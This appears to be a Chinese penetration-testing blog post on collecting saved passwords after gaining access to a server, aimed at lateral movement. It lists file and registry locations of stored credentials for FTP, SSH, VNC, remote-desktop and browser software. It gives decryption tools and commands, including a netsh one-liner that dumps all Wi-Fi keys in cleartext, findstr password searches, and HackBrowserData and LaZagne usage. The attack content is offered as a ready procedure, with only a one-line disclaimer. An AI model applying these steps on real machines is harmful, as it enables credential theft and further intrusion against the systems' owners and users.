内网常见软件密码收集

0x00 前言

一般拿到服务器权限后,总需要收集一些运维或网管机子上的密码信息,方便后面横向渗透。

0x01 获取tortoiseSVN连接密码

tortoiseSVN客户端连接记录文件位置:

%userprofile%\AppData\Roaming\Subversion\auth\svn.simple

文件内容:

解密方法,使用TSvnPwd获取密码:http://www.leapbeyond.com/ric/TSvnPD/TSvnPwd.exe

0x02获取FlashFXP连接密码

主要文件为FlashFXP安装目录下面的Sites.dat和quick.dat,quick.dat保存了快速连接的历史记录,Sites.dat保存了站点记录。

  • 解密方法1

复制整个FlashFXP安装目录至本地,

然后打开flashfxp.exe,

点击快速连接->历史,

可以看到历史连接记录,并且可以直接连接:

点击站点管理器可以看到保存的连接记录:

使用星号查看器可以直接看到明文密码:

  • 解密方法2

使用FlashfxpPasswordDecryptor破解密码:

https://www.cr173.com/soft/26711.html

0x03获取FILEZILLA连接密码

FILEZILLA客户端连接记录保存位置:

%userprofile%\AppData\Roaming\FileZilla\recentservers.xml

使用文本编辑器可以查看到账号密码,

用解码即可(此处为filezilla3)

0x04获取Serv-U密码

获取ServUDaemon.ini文件:

Serv-U一般安装目录位于“C:\program files\Serv-U\”

密码破解,

去掉前面两位字母然后到md5破解,

全靠运气,密码也是去掉前面两位字母:

0x05获取VNC连接密码

  • TightVNC
  • 注册表位置:
  • reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v Password
  • reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v PasswordViewOnly
  • TightVNC version 2.8.X位置:
  • reg query HKLM\SOFTWARE\TightVNC\Server /s

  • vncpwdump破解密码:http://www.cqure.net/tools/vncpwdump-win32-1_0_6.zip
  • vncpwdump.exe -k 78xxxxxxxx7

  • RealVNC
  • 注册表位置:
  • HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
  • 3.x 在 HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password ===windows 95
  • 3.x 在 HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default\Password ===Win NT
  • 4.x 在 HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 ===WinXP or Win2003
  • 5.x 在 HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver ===WinXP or Win2003
  • TigerVNC
  • 注册表位置:
  • HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4
  • UltraVNC
  • 配置文件位置:
  • C:\Program Files\UltraVNC\ultravnc.ini

0x06获取xshell记录密码

sessions文件位置:

XShell5 %userprofile%\Documents\NetSarang\Xshell\Sessions

XFtp5 %userprofile%\Documents\NetSarang\Xftp\Sessions

XShell6 %userprofile%\Documents\NetSarang Computer\6\Xshell\Sessions

XFtp6 %userprofile%\Documents\NetSarang Computer\6\Xftp\Sessions

使用Xdecrypt破解xshell保存的密码:

https://github.com/dzxs/Xdecrypt

 

0x07获取SecureCRT记录密码

SecureCRT ini文件位置

%userprofile%\AppData\Roaming\VanDyke\Config\Sessions\

密码解密,

获取ini文件中Password V2后面的值,去掉02:

python3 securecrt_password.py dec -v2 f83b09599d3e129xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxe7853c52

 

0x08获取winscp记录密码

默认注册表位置:

shell reg query "HKEY_USERS\S-1-5-21-****\Software\Martin Prikryl\WinSCP 2\Sessions\root@192.168.190.137" /s

HKEY_USERS\SID\Software\Martin Prikryl\WinSCP 2\Sessions\

WIN7\8下WinSCP文件默认位置:

%userprofile%\AppData\Local\VirtualStore\Program Files (x86)\WinSCP\WinSCP.ini (64位操作系统)

C:\Program Files (x86)\WinSCP\WinSCP.ini (64位操作系统)

%userprofile%\AppData\Local\VirtualStore\Program Files\WinSCP\WinSCP.ini (32位操作系统) - 专注网络安全2 p% t+ \* j$ r- a

C:\Program Files\WinSCP\WinSCP.ini (32位操作系统)

winscppwd破解密码:https://bitbucket.org/knarf/winscppwd/downloads/winscppwd.exe

winscppwd.exe winscp.ini

winscppwd.exe root 10.1xx.x.213 A35C425xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx3B2B6D6F656B696965646E646F8D

 

0x09获取浏览器信息

一键获取HackBrowserData:https://github.com/moonD4rk/HackBrowserData/

hack-browser-data.exe -b all -f json --dir results --cc

浏览器各类文件地址:

(1)、google

书签:%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks

Cookie: %userprofile%\AppData\Local\Google\Chrome\User Data\Default\Cookies

浏览历史:%userprofile%\AppData\Local\Google\Chrome\User Data\Default\History

当前的session:%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Current

Session 账号密码:%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Login

Data %userprofile%\AppData\Local\Google\Chrome\User Data\Profile 1\Login Data

(2)、QQ浏览器

⽤户数据⽬录:%userprofile%\AppData\Local\Tencent\QQBrowser\User Data\Default

缓存⽬录:%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Cache\

各⽂件如下:

书签:%userprofile%\AppData\Local\Tencent\QQBrowser\UserData\Default\Bookmarks

Cookie: %userprofile%\AppData\Local\Tencent\QQBrowser\UserData\Default\Cookies

浏览历史:%userprofile%\AppData\Local\Tencent\QQBrowser\UserData\Default\History

当前的session:%userprofile%\AppData\Local\Tencent\QQBrowser\UserData\Default\CurrentSession

账号密码:%userprofile%\AppData\Local\Tencent\QQBrowser\UserData\Default\Login

Data或 %userprofile%\AppData\Local\Tencent\QQBrowser\UserData\Default\xxxxxxxxxxx\6

(3)、360浏览器

账号密码⽂件:%userprofile%\AppData\Roaming\360se6\User

Data\Default\apps\LoginAssis\assis2.db

(4)、Firefox

账号密码⽂件:

%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\7s5izkwl.defaultrelease\logins.json

0x10获取向日葵密码

配置文件位置:

安装版:C:\Program Files\Oray\SunLogin\SunloginClient\config.ini

便携版(绿色版):C:\ProgramData\Oray\SunloginClient\config.ini

工具:https://github.com/wafinfo/Sunflower_get_Password

 

 

0x11获取wifi连接密码

for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

0x12获取FinalShell连接密码

以MAC为例,Finalshell保存密码的默认路径为:

/Users/<yourhostname>/Library/FinalShell/conn

FinalShellDecodePass脚本解密:

java FinalShellDecodePass <密文字符串>

 

0x13获取teamview连接密码

 

teamviewer-dumper:https://github.com/attackercan/teamviewer-dumper

 

 

0x14获取服务端明文存储密码

 

在一些配置文件或日志里,

明文记录着敏感的密码信息,

如web.config、config.ini等文件,

可通过手动翻查敏感目录,

也可以通过findstr命令来查找敏感文件和内容。

findstr /i /s "password" *.config

findstr /i /s "password" *.ini

findstr /i /s "password" *.xml

 

0x15综合

 

LaZagnez用于检索存储在本地计算机上的帐户密码的开源程序:

https://github.com/AlessandroZ/LaZagne

 

 

*本文章仅供技术交流分享,请勿做未授权违法攻击,雨笋教育不负任何责任。具体请参考《网络安全法》。

更多渗透技术分享,欢迎私信交流。

 

咨询渗透测试学习:15386496074

 

 

posted @   小牛在行动  阅读(1420)  评论(0编辑  收藏  举报
编辑推荐:
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
阅读排行:
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 【设计模式】告别冗长if-else语句:使用策略模式优化代码结构
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
点击右上角即可分享
微信分享提示